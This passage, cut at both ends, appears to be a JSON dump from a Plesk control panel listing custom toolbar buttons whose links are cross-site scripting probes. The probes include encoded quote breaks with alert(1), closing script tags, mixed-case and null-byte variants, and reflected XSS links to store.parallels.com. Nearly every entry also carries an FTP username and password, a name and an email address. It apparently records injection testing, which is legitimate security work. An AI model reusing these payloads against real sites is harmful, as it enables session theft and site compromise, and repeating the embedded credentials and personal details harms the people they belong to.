xss?","icon":"\/images\/custom_buttons\/{0-69915200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e27d6%2522%253b9ddf3b95647?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-6a0856c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3d5a5%2522%252dalert%25281%2529%252d%25225ca54b544?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-77ac57e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4d8c7%2522%252dalert%25281%2529%252d%25221949039db7c?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-78d38260-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"614b3%255c%2522%253be210f06fb27?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8205b240-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4f900%255c%2522%253b6cc1851587?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-839cbd60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-896a1760-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8b4167a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c%253c%252fscript%253e92757840c8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8d69a6a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f%253c%252fscript%253ee4b7ce199c3?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8f4a7c60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%009f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-91112300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-935f7800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-947abba0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-96bd29c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12%253c%252fScRiPt%2520%253e2e0a3728b8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-982bbd80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5%253c%252fScRiPt%2520%253e05c4f3b01c2?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9a708d00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9bd0d880-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9e075fc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"13e85%2527%253b2fac11d343e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-a326f560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2f63%2527%252dalert%25281%2529%252d%25278e70213d4f4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab68ba60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c75a4%255c%2527%253b6186c64b550?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b1b90000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b5843100-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463%253c%252fscript%253e490b561a81?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b75b8140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b93eb860-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bb4cc840-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f%253c%252fScRiPt%2520%253e2cdf6c3b534?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd4ef140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bf2b0440-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"83b38%2522%253b79ac1f4c99d?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-df4b32e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"683d4%2522%252dalert%25281%2529%252d%25225babbed5232?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e2689f80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a881a%2522%253bcc41ad8a12?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e47910c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e1a57%255c%2522%253b30bc91affda?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e5e08060-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3336f%2522%252dalert%25281%2529%252d%25224d488d471d0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e7f35300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e83f7f00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56%253c%252fscript%253ebca635fbfb?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e9a22be0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb17e3c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7764%255c%2522%253b55ff7405d87?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb4c4200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ec62c2e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed6d5ce0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564%253c%252fScRiPt%2520%253e32fe847420e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed9a9700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4%253c%252fscript%253e060a7d1f2c0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeaeb680-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0040564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeea38e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-effbf700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ca12f%2527%253b35fe7f9ef49?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f0fd0b80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f13fb200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7%253c%252fScRiPt%2520%253ec28bafc4b33?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f28a9120-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f4050bc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a812b%2527%252dalert%25281%2529%252d%25270d7822b344b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f40e9140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7d63%2527%253b2f26f55ca59?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f7bf9320-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"8692e%255c%2527%253b0d203c8e729?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f9ba9800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b28c2%2527%252dalert%25281%2529%252d%252752a751e644d?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc6a8560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc909b60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e%253c%252fscript%253ecf16d55fc95?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fde50000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0088f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff1f3580-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"5b27d%255c%2527%253b1ce9a941be4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff4a0e40-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0067b340-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0150fa00-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3%253c%252fScRiPt%2520%253e4a0c2054c2b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-01be7940-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7%253c%252fscript%253e351654a9214?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-028d90e0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%002b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-02f64d60-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-03cc8920-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0506bea0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8%253c%252fScRiPt%2520%253ec493568736e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0639d000-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0035df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0771a420-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 